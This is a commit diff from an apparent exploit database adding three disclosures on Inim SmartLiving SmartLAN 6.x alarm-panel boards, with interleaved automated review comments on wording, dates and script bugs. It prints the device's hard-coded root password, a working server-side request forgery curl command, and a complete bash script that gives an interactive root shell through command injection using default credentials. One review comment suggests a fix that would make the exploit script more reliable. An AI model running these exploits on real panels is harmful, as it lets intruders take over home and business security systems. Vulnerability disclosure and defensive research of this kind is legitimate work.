DB: 2019-12-11
3 changes to exploits/shellcodes
Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials
Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery
Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
parent 44b163c8d1
commit 09d5da74fb
4 changed files with 346 additions and 0 deletions
79
exploits/hardware/local/47763.txt
Normal file
@ -0,0 +1,79 @@
# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials
# Exploit Author: LiquidWorm
# Date: 2019-12-09
# Product web page: https://www.inim.biz
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
# Advisory ID: ZSL-2019-5546
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php

Inim Electronics Smartliving SmartLAN/G/SI <=6.x Hard-coded Credentials


Vendor: INIM Electronics s.r.l.
Product web page: https://www.inim.biz
Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
Affected version: <=6.x
Affected models: SmartLiving 505
SmartLiving 515
SmartLiving 1050, SmartLiving 1050/G3
SmartLiving 10100L, SmartLiving10100L/G3

Summary: SmartLiving anti-intrusion control panel and security system provides
important features rarely found in residential, commercial or industrial application
systems of its kind. This optimized-performance control panel provides first-rate
features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
end-to-end voice transmission (voice-on-bus), IP connectivity.

SMARTLAN/SI:
The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
networking capability and fast connectivity to the Internet. Therefore, it is possible
to set up a remote connection and program or control the system via the SmartLeague
software application. In effect, the SmartLAN/SI board grants the same level of access
to the system as a local RS232 connection.

SMARTLAN/G:
The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
advanced remote-access and communication functions. The SmartLAN/G board is capable of
sending event-related e-mails automatically. Each e-mail can be associated with a subject,
an attachment and a text message. The attachment can be of any kind and is saved to an
SD card. The message text can contain direct links to domains or IP addressable devices,
such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
global access to their control panels via any Internet browser accessed through a PC,
PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
distinguishing the means of connection and as a result provides an appropriate web-page
for the tool in use. Smartphones can control the system in much the same way as a
household keypad, from inside the house or from any part of the world.

Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
These sets of credentials (Telnet, SSH, FTP) are never exposed to the end-user and cannot
be changed through any normal operation of the smart home device. Attacker could exploit
this vulnerability by logging in and gain system access.

Tested on: GNU/Linux 3.2.1 armv5tejl
Boa/0.94.14rc21
BusyBox v1.20.2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2019-5546
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php


06.09.2019

--


# cat /etc/passwd
root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:administrator:/:/bin/sh
nobody:*:254:254:nobody:/var/empty:/bin/sh
logout:gfr8cijmRSDck:498:506:logout:/:

# john --show /etc/passwd
root:pass:0:0:administrator:/:/bin/sh
logout:logout:498:506:logout:/:

2 password hashes cracked, 0 left
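Review bot: The description's grammar needs tidying: "The devices utilizes" should read "The device utilizes", and "by logging in and gain system access" should be "by logging in and gaining system access". The header uses "# Exploit Author:" where the two sibling files in this commit use "# Author:"; pick one form for the set. The entry also names the exposed services (Telnet, SSH, FTP) and states the accounts cannot be changed by the operator, but gives no vendor fix status or mitigation, so a reader cannot tell whether any firmware revision addresses this; a line pointing to the advisory's disclosure timeline or a workaround (not exposing the board's management services beyond the local network) would help defenders triage.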
72
exploits/hardware/webapps/47764.txt
Normal file
@ -0,0 +1,72 @@
# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery
# Author: LiquidWorm
# Date: 2019-12-09
# Product web page: https://www.inim.biz
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
# Version: 6.x
# Advisory ID: ZSL-2019-5545
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php

Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF


Vendor: INIM Electronics s.r.l.
Product web page: https://www.inim.biz
Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
Affected version: <=6.x
Affected models: SmartLiving 505
SmartLiving 515
SmartLiving 1050, SmartLiving 1050/G3
SmartLiving 10100L, SmartLiving10100L/G3

Summary: SmartLiving anti-intrusion control panel and security system provides
important features rarely found in residential, commercial or industrial application
systems of its kind. This optimized-performance control panel provides first-rate
features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
end-to-end voice transmission (voice-on-bus), IP connectivity.

SMARTLAN/SI:
The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
networking capability and fast connectivity to the Internet. Therefore, it is possible
to set up a remote connection and program or control the system via the SmartLeague
software application. In effect, the SmartLAN/SI board grants the same level of access
to the system as a local RS232 connection.

SMARTLAN/G:
The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
advanced remote-access and communication functions. The SmartLAN/G board is capable of
sending event-related e-mails automatically. Each e-mail can be associated with a subject,
an attachment and a text message. The attachment can be of any kind and is saved to an
SD card. The message text can contain direct links to domains or IP addressable devices,
such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
global access to their control panels via any Internet browser accessed through a PC,
PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
distinguishing the means of connection and as a result provides an appropriate web-page
for the tool in use. Smartphones can control the system in much the same way as a
household keypad, from inside the house or from any part of the world.

Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the
SmartLiving SmartLAN within the GetImage functionality. The application parses user
supplied data in the GET parameter 'host' to construct an image request to the service
through onvif.cgi. Since no validation is carried out on the parameter, an attacker
can specify an external domain and force the application to make an HTTP request to
an arbitrary destination host. This can be used by an external attacker for example
to bypass firewalls and initiate a service and network enumeration on the internal
network through the affected application.

Tested on: GNU/Linux 3.2.1 armv5tejl
Boa/0.94.14rc21
BusyBox v1.20.2


Vulnerability discovered by Sipke Mellema
@zeroscience


Advisory ID: ZSL-2019-5545
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php


PoC:

curl http://192.168.1.17/cgi-bin/onvif.cgi -X POST -d"mod=GetImage&host=http://127.0.0.1:23&par=2"
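Review bot: The description says the 'host' value comes from a GET parameter, but the PoC submits it in a POST body (`curl ... -X POST -d"mod=GetImage&host=..."`), so one of the two is wrong; either change the description to say POST parameter or show a GET request. Minor copy fix: "such as a security cameras" should be "such as security cameras" (the same boilerplate appears in all three files). A one-line remediation note would also help readers assessing a fix, e.g. that onvif.cgi should accept only addresses of the panel's own configured cameras rather than an arbitrary URL.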
192
exploits/hardware/webapps/47765.txt
Normal file
@ -0,0 +1,192 @@
# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
# Author: LiquidWorm
# Date: 2019-12-09
# Product web page: https://www.inim.biz
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
# Version: 6.x
# Advisory ID: ZSL-2019-5545
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php

#!/bin/bash
#
#
# Inim Electronics SmartLiving SmartLAN/G/SI <=6.x Root Remote Command Execution
#
#
# Vendor: INIM Electronics s.r.l.
# Product web page: https://www.inim.biz
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
# Affected version: <=6.x
# Affected models: SmartLiving 505
# SmartLiving 515
# SmartLiving 1050, SmartLiving 1050/G3
# SmartLiving 10100L, SmartLiving10100L/G3
#
# Summary: SmartLiving anti-intrusion control panel and security system provides
# important features rarely found in residential, commercial or industrial application
# systems of its kind. This optimized-performance control panel provides first-rate
# features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
# end-to-end voice transmission (voice-on-bus), IP connectivity.
#
# SMARTLAN/SI:
# The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
# networking capability and fast connectivity to the Internet. Therefore, it is possible
# to set up a remote connection and program or control the system via the SmartLeague
# software application. In effect, the SmartLAN/SI board grants the same level of access
# to the system as a local RS232 connection.
#
# SMARTLAN/G:
# The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
# advanced remote-access and communication functions. The SmartLAN/G board is capable of
# sending event-related e-mails automatically. Each e-mail can be associated with a subject,
# an attachment and a text message. The attachment can be of any kind and is saved to an
# SD card. The message text can contain direct links to domains or IP addressable devices,
# such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
# global access to their control panels via any Internet browser accessed through a PC,
# PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
# distinguishing the means of connection and as a result provides an appropriate web-page
# for the tool in use. Smartphones can control the system in much the same way as a
# household keypad, from inside the house or from any part of the world.
#
# Desc: SmartLiving SmartLAN suffers from an authenticated remote command injection vulnerability.
# The issue exist due to the 'par' POST parameter not being sanitized when called with
# the 'testemail' module through web.cgi binary. The vulnerable CGI binary (ELF 32-bit
# LSB executable, ARM) is calling the 'sh' executable via the system() function to issue
# a command using the mailx service and its vulnerable string format parameter allowing
# for OS command injection with root privileges. An attacker can remotely execute system
# commands as the root user using default credentials and bypass access controls in place.
#
# ================= dissassembly of vuln function =================
#
#[0x0000c86c]> pd @ 0x000c86c
#| ;-- pc:
#| ;-- r15:
#| 0x0000c86c ldr r1, str.testemail ; [0xed96:4]=0x74736574 ; "testemail" ; const char * s2
#| 0x0000c870 bl sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)
#| 0x0000c874 cmp r0, 0
#| 0x0000c878 bne 0xc8b8
#| 0x0000c87c cmp sl, 0
#| 0x0000c880 beq 0xd148
#| 0x0000c884 bl sym.set_no_cache
#| 0x0000c888 add r5, sp, 0x20
#| 0x0000c88c mov r0, r4
#| 0x0000c890 ldr r1, str.application_json ; [0xeda0:4]=0x6c707061 ; "application/json"
#| 0x0000c894 bl sym.imp.qcgires_setcontenttype
#| 0x0000c898 mov r0, r5 ; char *s
#| 0x0000c89c mov r1, 0xc8 ; 200 ; size_t
#| 0x0000c8a0 ldr r2, str.echo__Hello_____mailx__s__Email_test___s ; [0xedb1:4]=0x6f686365 ; "echo \"Hello!\" | mailx -s \"Email test\" %s" ; con
#| 0x0000c8a4 mov r3, r8 ; ...
#| 0x0000c8a8 bl sym.imp.snprintf ; int snprintf(char *s,
#| 0x0000c8ac mov r0, r5 ; const char * string
#| 0x0000c8b0 bl sym.imp.system ; int system(const char *string)
#| 0x0000c8b4 b 0xd134
#|
#| system() @0x0000c8b0 arguments: "sh -c echo "Hello!" | mailx -s "Email test" %s"
#| Trigger suggest: $(curl -sik http://192.168.1.17/cgi-bin/web.cgi -X POST --data "mod=testemail&par=;/sbin/ifconfig" --cookie "user=admin;pass=pass;code=9999")
#| Process: 1351 root 0:00 sh -c echo "Hello!" | mailx -s "Emaiil test" ;/sbin/ifconfig
#|__
# =================================================================
#
# -----------------------------------------------------------------
#
# root@kali:~# ./xpl.sh https://192.168.1.17
#
# Checking target: https://192.168.1.17
# ACCESS GRANTED!
#
# root@ssl> id; uname -a; getconf LONG_BIT; cat ../version.html; pwd
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
# Linux SmartLAN 3.2.1 #195 PREEMPT Thu May 30 15:26:27 CEST 2013 armv5tejl GNU/Linux
# 32
# <!-- SLF6.07 10100 -->
# <html><body><h2>
# SmartLiving 6.07 10100
# <br><br>SmartLAN/G v. 6.11
# /www/cgi-bin
# root@ssl> exit
# root@kali:~/#
#
# -----------------------------------------------------------------
#
# Tested on: GNU/Linux 3.2.1 armv5tejl
# Boa/0.94.14rc21
# BusyBox v1.20.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5544
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5544.php
#
#
# 06.09.2019
#

URL=$1
CGI="/cgi-bin/web.cgi"
COOK="user=admin;pass=pass;code=9999"
COOK1="user=admin;pass=pass;code=9998"
COOK2="user=user;pass=pass;code=0001"
PARAMS="mod=testemail&par=;"
CHECK=${URL:4:1}

if [ "$#" -ne 1 ]; then
echo -en "\e[34m"
echo "==============================================="
echo " SmartLiving SmartLAN 6.x Remote Root Exploit"
echo -e "\t\tZSL-2019-5544"
echo "==============================================="
echo -en "\e[00m"
echo -e "\nUsage: $0 http(s)://ip:port\n"
exit 0
fi

echo -ne "\nChecking target: $URL\n"

if [ "$CHECK" == "s" ]; then
TEST=$(curl -sIk $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
echo "HTTPS with error!"
exit 0
fi
if curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
then
echo -e "ACCESS GRANTED!\n"
else
echo "Invalid credentials."
exit 0
fi
while true; do
R="$(tput sgr0)"
S="$(tput setaf 2)"
read -rp "${S}root@ssl>${R} " CMD
if [[ "$CMD" == "exit" ]]; then
exit 0
fi
curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5
done
else
TEST=$(curl -sI $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
echo "HTTP with error!"
exit 0
fi
if curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
then
echo -e "ACCESS GRANTED!\n"
else
echo "Invalid credentials."
exit 0
fi
while true; do
R="$(tput sgr0)"
S="$(tput setaf 2)"
read -rp "${S}root@http>${R} " CMD
if [[ "$CMD" == "exit" ]]; then
exit 0
fi
curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5
done
fi
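Review bot: The connection-failure check never fires: after `TEST=$(curl -sIk $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')`, the `$?` tested in `if [[ "$?" = "7" ]] || ...` is the exit status of the last command in that pipeline (awk), not of curl, so curl's code 7 can never be observed; either run curl on its own and test its status before extracting the HTTP code, or enable `set -o pipefail`. The same pattern is repeated in the plain-HTTP branch. Second, the header block at the top says Advisory ID ZSL-2019-5545 (the SSRF advisory's ID in the sibling file) while the script body, its Advisory URL and the usage banner all say ZSL-2019-5544; the header looks like a copy-paste slip. Third, the Exploit Title says "Remote Command Execution" while the Desc line states the injection is authenticated and relies on default credentials; carrying that qualifier into the title helps readers triage. Minor: COOK1 and COOK2 are defined but never used, "dissassembly" is misspelled, and "The issue exist" should be "The issue exists".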
@ -10834,6 +10834,7 @@ id,file,description,date,author,type,platform,port
47754,exploits/windows/local/47754.py,"Microsoft Windows - 'WSReset' UAC Protection Bypass (Registry)",2019-09-02,valen,local,windows,
47755,exploits/windows/local/47755.c,"Microsoft Windows 10 - 'WSReset' UAC Protection Bypass (propsys.dll)",2019-09-20,valen,local,windows,
47759,exploits/windows/local/47759.py,"SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)",2019-12-09,"Kirill Nikolaev",local,windows,
47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
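Review bot: The new 47763 row is dated 2019-12-10, but the file's own "# Date:" header says 2019-12-09; the index and the file should agree on one date. The row is also typed "local" although the file describes credentials for network services (Telnet, SSH, FTP), so "remote" may be the more accurate type; if "local" is the intended convention for hard-coded-credential entries, a note in the commit message would avoid the question.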
@ -42072,3 +42073,5 @@ id,file,description,date,author,type,platform,port
47760,exploits/hardware/webapps/47760.py,"Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution",2019-12-09,Hodorsec,webapps,hardware,
47761,exploits/php/webapps/47761.py,"Alcatel-Lucent Omnivista 8770 - Remote Code Execution",2019-12-09,0x1911,webapps,php,
47762,exploits/java/webapps/47762.txt,"Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting",2019-12-09,omurugur,webapps,java,
47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,
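Review bot: Same date mismatch as the first hunk: both new rows say 2019-12-10 while the files' "# Date:" headers say 2019-12-09. The 47765 description also omits that the command injection is authenticated (the file's Desc states that default credentials are required), whereas the 47764 description correctly carries "Unauthenticated"; adding "Authenticated" to the 47765 title keeps the two consistent for anyone filtering the index by pre-auth issues.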